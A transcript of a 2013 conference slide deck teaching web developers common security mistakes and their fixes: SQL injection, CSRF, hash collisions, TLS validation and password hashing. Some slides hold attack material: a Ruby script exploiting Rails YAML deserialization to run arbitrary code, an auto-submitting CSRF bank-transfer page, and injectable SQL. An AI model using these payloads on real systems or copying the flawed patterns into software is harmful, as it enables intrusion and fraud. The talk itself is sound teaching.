Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security for dummies

Security for dummies

Presentation given at the Enschede Web Developers meetup

Dirkjan Bussink

June 25, 2013
Tweet

More Decks by Dirkjan Bussink

Other Decks in Technology

Transcript

  1. statement = "SELECT * FROM users WHERE name = '"

    + username + "'" SQL Injection
  2. statement = ["SELECT * FROM users WHERE name = ?",

    username] SQL Injection Parameter binding
  3. Mass assignment <html> <body> <form method="post" action="new_person"> <input type="text" name="name"

    value="" id="" /> <input type="hidden" name="parent_id" value="123" id="" /> <input type="submit" value="" id="" /> </form> </body> </html> What if I add this?
  4. require 'net/http' require 'net/https' require 'uri' require 'yaml' code =

    ARVG[0] url = "http://localhost:3000" escaped_code = "foo; #{code}\n__END__\n" yaml = %{ --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection ? #{escaped_code.to_yaml.sub('--- ','').chomp} : !ruby/object:OpenStruct table: :defaults: :action: create :controller: foos :required_parts: [] :requirements: :action: create :controller: foos :segment_keys: - :format modifiable: true }.strip xml = %{ <?xml version="1.0" encoding="UTF-8"?> <exploit type="yaml">#{yaml}</exploit> }.strip uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) request = Net::HTTP::Post.new(uri.request_uri, "X-HTTP-Method-Override" => "GET") request.content_type = "text/xml" request.set_body_internal(xml) response = http.request(request)
  5. On my evil hack site Just loading my page transfers

    money <iframe name=hack></iframe> <script> document.write('<form target=hack name=go method=post action="http://mybank.com/transfer.php"> </form>') go.submit() </script>
  6. <html> <body> <form method="post" action="transfer.php"> <input type="text" name="csrf_token" value="om5bohY2" id=""

    /> <input type="text" name="amount" value="" id="" /> <input type="text" name="from_account" value="" id="" /> <input type="text" name="to_account" value="" id="" /> <input type="submit" value="" id="" /> </form> </body> </html> Add token to each form Token ensures other site can’t simply POST to your
  7. Bucket 0 1 2 3 4 5 Figure 1: Normal

    operation of a hash table. suggested the use of crypto puzzles [9] to force clients to perform more work before the server does its work. Provably requiring the client to con- sume CPU time may make sense for fundamen- tally expensive operations like RSA decryption, but it seems out of place when the expensive opera- tion (e.g., HTML table layout) is only expensive because a poor algorithm was used in the system. Another recent paper [16] is a toolkit that allows programmers to inject sensors and actuators into a program. When a resource abuse is detected an ap- propriate action is taken. Bucket 0 1 2 3 4 5 Figure 2: Worst-case hash table collisions. bles are so common that programming languages like Perl provide syntactic sugar to represent hash tables as “associative arrays,” making them easy for programmers to use. Programmers clearly prefer hash tables for their constant-time expected behav- ior, despite their worst-case O(n) per-operation run- ning time. After all, what are the odds that a hash table will degenerate to its worst case behavior? In typical usage, objects to be inserted into a hashtable are first reduced to a 32-bit hash value. Strings might be hashed using a checksum oper- Craft input for collision
  8. The “advanced” SSLSocketFactory API silently skips hostname verification if the

    algorithm field in the SSL client is NULL or an empty string rather than HTTPS Java Why this as the default?
  9. require "net/http" require "net/https" require "uri" uri = URI.parse("https://secure.site/") http

    = Net::HTTP.new uri.host, uri.port http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) Ruby Does not validate certificate by default...
  10. 1.93% were between 6 and 10 characters long 2.45% were

    comprised entirely of lowercase characters 3.36% were found in a common password dictionary 4.67% were reused by the same person on a totally unrelated service (Gawker) 5.Only 1% of them contained a non-alphanumeric character 77 million breached PlayStation Network accounts
  11. KDF 6 letters 8 letters 8 chars 10 chars 40-char

    text DES CRYPT < $1 < $1 < $1 < $1 < $1 MD5 < $1 < $1 < $1 $1.1k $1 MD5 CRYPT < $1 < $1 $130 $1.1M $1.4k PBKDF2 (100 ms) < $1 < $1 $18k $160M $200k bcrypt (95 ms) < $1 $4 $130k $1.2B $1.5M scrypt (64 ms) < $1 $150 $4.8M $43B $52M PBKDF2 (5.0 s) < $1 $29 $920k $8.3B $10M bcrypt (3.0 s) < $1 $130 $4.3M $39B $47M scrypt (3.8 s) $900 $610k $19B $175T $210B
  12. Add new authentication When user logs in, store password in

    new way After X time remove old passwords
  13. AES CBC / CTR When using CBC mode, an Initialization

    Vector (IV) is provided along with the key when starting an encrypt or decrypt operation. If CBC mode is selected and no IV is provided, an IV of all zeroes will be used.
  14. https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/SQL_Injection https://www.owasp.org/index.php/Top_10_2010-A4 https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html http://gpuscience.com/cs/cracking-salted-sha1-password-hashes-on-gpu/ http://www.bsdcan.org/2009/schedule/attachments/86_scrypt_slides.pdf

    http://en.wikipedia.org/wiki/Hash-based_message_authentication_code http://blog.jcoglan.com/2012/06/09/why-you-should-never-use-hash-functions-for-message-authentication/ http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29 http://en.wikipedia.org/wiki/Padding_oracle_attack http://tonyarcieri.com/all-the-crypto-code-youve-ever-written-is-probably-broken https://www.coursera.org/course/crypto Background